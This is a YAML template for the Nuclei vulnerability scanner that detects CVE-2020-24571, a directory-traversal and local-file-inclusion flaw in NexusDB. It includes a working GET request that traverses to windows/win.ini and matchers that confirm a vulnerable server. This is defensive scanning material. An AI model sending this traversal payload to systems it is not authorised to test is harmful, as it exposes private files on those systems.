42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
id: CVE-2020-24571
|
|
|
|
info:
|
|
name: NexusDB <4.50.23 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.
|
|
remediation: |
|
|
Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability.
|
|
reference:
|
|
- https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24571
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-24571
|
|
cwe-id: CWE-22
|
|
epss-score: 0.049
|
|
epss-percentile: 0.91943
|
|
cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: nexusdb
|
|
product: nexusdb
|
|
tags: cve,cve2020,nexusdb,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/../../../../../../../../windows/win.ini'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "[extensions]"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220337e31d411baebee24f05081b2f0b7e3fbac75e978f5f61d17632a02321f88c7022100acce54889490c7857ebd16cb7c7d303b1bce931401d2ca84279b0fa2294f16d7:922c64590222798bb761d5b6d8e72950 |